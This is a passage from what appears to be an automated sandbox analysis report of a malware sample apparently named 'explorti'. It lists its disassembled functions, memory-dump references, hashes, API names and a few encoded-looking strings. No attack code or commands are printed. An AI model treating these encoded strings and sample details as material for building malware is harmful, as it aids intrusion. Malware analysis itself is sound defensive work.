                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                    • Instruction ID: 37259de212e73201d4ccf979b8385d5321c15323e918f58d185ebd65ea71d6c6
                    • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                    • Instruction Fuzzy Hash: 8FF17F71E002299FDF14CFA9D9806AEF7B1FF48314F55826AE819AB344D774AE01CB94
                    Function 003FCAED Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,003FCE55,?,?,?,?,003FCE8A,?,?,?,?,?,?,003FC400,?,00000001), ref: 003FCB06
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FilePreciseSystem
                    • String ID:
                    • API String ID: 1802150274-0
                    • Opcode ID: e49bca10c7cc19835aa23b6b25383a18a46718ae328b678bb92585a2e9939e12
                    • Instruction ID: 61951e9cbc200c5687a0357be40c0dc523f6f627169e739920520b8c41e2e3c5
                    • Opcode Fuzzy Hash: e49bca10c7cc19835aa23b6b25383a18a46718ae328b678bb92585a2e9939e12
                    • Instruction Fuzzy Hash: 95D0223A69303C93CE032B80BC114BEBB0CDA02F503011031EA0E17120CA50AC004BE8
                    Function 003E4AD0 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: eBs
                    • API String ID: 0-1845495228
                    • Opcode ID: c417b58745181434092d64e8d7f4098a5f9c4b8524bfb86c6f83f1a38b2ce1db
                    • Instruction ID: 30458849559d45d2ada17912bb4327b060cb96218f05d6abf3251d0f7719c1cd
                    • Opcode Fuzzy Hash: c417b58745181434092d64e8d7f4098a5f9c4b8524bfb86c6f83f1a38b2ce1db
                    • Instruction Fuzzy Hash: 7D5180716087D18FD31ACF2D851623AFBF1BF99201F094A9EE0DA87292D775DA04CB91
                    Function 003E4CD0 Relevance: .7, Instructions: 701COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 192bbd0b10f317d3b8dec0b04b6023515f92f20c9da162f4f4cf720d8faf834f
                    • Instruction ID: c403240b4596b6002b1f0381ee533020bc142bc5950c9d91fb5d0ebd4932e2f0
                    • Opcode Fuzzy Hash: 192bbd0b10f317d3b8dec0b04b6023515f92f20c9da162f4f4cf720d8faf834f
                    • Instruction Fuzzy Hash: 062260B7F515144BDB4CCB9DDCA27ECB2E3AFD8214B0E803DA40AE3345EA79D9158648
                    Function 00426EE9 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cced6df08d6a6ed67c0d73c48ed75db51d1fffd7e3ef0c1dcb06352fc74456b1
                    • Instruction ID: 8b7fbd46b5dd9507d8409e68f0f9d091659b08e65d8ef49ae2ab2f62eea7752a
                    • Opcode Fuzzy Hash: cced6df08d6a6ed67c0d73c48ed75db51d1fffd7e3ef0c1dcb06352fc74456b1
                    • Instruction Fuzzy Hash: 3FB17B31210615DFDB18CF28D486B667BE0FF05364F658659E89ACF3A1C339E992CB44
                    Function 00417D63 Relevance: .2, Instructions: 216COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction ID: 43937997a352f7ca02b81c26ba2bc4be041aa743b25004f95e9c051a5f6ff0c6
                    • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction Fuzzy Hash: CB51357024C7495ADF388A2884967FF67FA9F42304F28049FE542D7782DA1D9DC6826E
                    Function 003FD2E8 Relevance: .2, Instructions: 172COMMON
                    Download Yara Rule
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 003E23BE
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID:
                    • API String ID: 2659868963-0
                    • Opcode ID: 87ee56c4aa35526ca2761d7871ba0ef1060adcf1804ae33de9701e1ae90f4722
                    • Instruction ID: 64c6ca1cdecde2b29b0d623fc4f7819c03535fa17dcc5823ee762bb3cc022f44
                    • Opcode Fuzzy Hash: 87ee56c4aa35526ca2761d7871ba0ef1060adcf1804ae33de9701e1ae90f4722
                    • Instruction Fuzzy Hash: 1E51DFB6E0060ACBDB16CF54D8897AEB7F6FB18310F25812AE615EB291D3749D40CB64
                    Function 0042775B Relevance: .1, Instructions: 104COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7cc6700fc56617687bf68132f4eb6abbeb8df428c60fdd0f72b9e2bb0ae75a51
                    • Instruction ID: 27d034983e058dd3a583c38ae1517f6f73c6642926286207adc97489439672d5
                    • Opcode Fuzzy Hash: 7cc6700fc56617687bf68132f4eb6abbeb8df428c60fdd0f72b9e2bb0ae75a51
                    • Instruction Fuzzy Hash: 6921B673F20439477B0CC57E8C5727DB6E1C68C541745423EE8A6EA2C1D968D917E2E4
                    Function 0042763B Relevance: .1, Instructions: 81COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2b30e6965e8d88bf419c72dbe3cddb02c0b16b6477ebc56296af77f7e1b048c2
                    • Instruction ID: 79755c200dea768a49137f36adc744733fec4b36e1a8451d1d28153150503d21
                    • Opcode Fuzzy Hash: 2b30e6965e8d88bf419c72dbe3cddb02c0b16b6477ebc56296af77f7e1b048c2
                    • Instruction Fuzzy Hash: 3011C663F30C355B675C817D8C172BAA2D2EBD825034F433ED826E7284E9A4DE23D290
                    Function 00428700 Relevance: .1, Instructions: 76COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: 86708f03a9cab89eb061f43c25da163425aaf12ffbd2c83bef8f46c68f900114
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: 87110B7B3030B183D604862DFCB45BF9795EBC53207BC437FD1414B754DA2EA5459508
                    Function 0041643B Relevance: .0, Instructions: 24COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 68bec2ec09c64458170b5064c6e6037b5d8f66b74d907bd32b2f3f7e1cf45952
                    • Instruction ID: 3b6e358585fdf05725465b092f8b99407826b4dd5e52bacd125cdc72754ebf64
                    • Opcode Fuzzy Hash: 68bec2ec09c64458170b5064c6e6037b5d8f66b74d907bd32b2f3f7e1cf45952
                    • Instruction Fuzzy Hash: DDE08C31141648AEDF277F56C808ECA3BAAEF51348F01480AFC0896221CB39EEC1C998
                    Function 0041A1A2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction ID: 21294d065d6f009ed7b4272cce636bbd88598ef614ebc9913da2cf004d8cd23e
                    • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction Fuzzy Hash: C9E08C72912228FBCB14DB89C90498AF3ECEB48B44F11049BB501D3250C274DE40C7D4
                    Function 003F2DF0 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 434COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 246122658369$Ip==$Krkk$Zww=$aAJTazgvOn==$invalid stoi argument$stoi argument out of range$eBs
                    • API String ID: 0-3760508568
                    • Opcode ID: 3557bb89ba6ecbc6a7128df79067826b8c3c87773b271e6214533cb235f442a3
                    • Instruction ID: 72864675906604c94df61cfb6a51467075aedb51a1e4c979eb3b47a2fc9acbfb
                    • Opcode Fuzzy Hash: 3557bb89ba6ecbc6a7128df79067826b8c3c87773b271e6214533cb235f442a3
                    • Instruction Fuzzy Hash: 3502027090024CEFEF16DFA8C845BEEBBB5AF05304F504558E905AB282D7759A84CBA1
                    Function 003E2DC0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 272COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Cnd_broadcast
                    • String ID: eBs
                    • API String ID: 32384418-1845495228
                    • Opcode ID: 776d5c1eea251b6ee57eedce71b18c322fcc671f515e5c4cde3c855d95587883
                    • Instruction ID: e2f21b486b64080ead852ca8510e5e555c3222620959cf0eabc7d7f6ecfcd28f
                    • Opcode Fuzzy Hash: 776d5c1eea251b6ee57eedce71b18c322fcc671f515e5c4cde3c855d95587883
                    • Instruction Fuzzy Hash: 5DA1F2B0A012699FDB12DF66C944B6BB7F8FF05310F048269E915DB281EB35EA05CBD1
                    Function 003FBA72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
